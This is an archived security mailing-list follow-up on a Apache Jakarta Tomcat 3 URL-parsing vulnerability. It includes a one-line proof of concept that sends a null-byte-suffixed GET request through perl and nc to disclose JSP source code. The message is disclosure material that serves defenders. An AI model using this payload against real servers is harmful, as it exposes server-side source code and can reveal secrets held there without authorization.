lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.33.0301301447240.2585-100000@lissu.solutions.fi> From: jouko at solutions.fi (Jouko Pynnonen) Subject: Apache Jakarta Tomcat 3 URL parsing vulnerability One more thing: the vulnerability also allows remote users to retrieve source of JSP files in this way: $ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080 -- Jouko Pynnonen Online Solutions Ltd Secure your Linux - jouko@...utions.fi http://www.solutions.fi http://www.secmod.com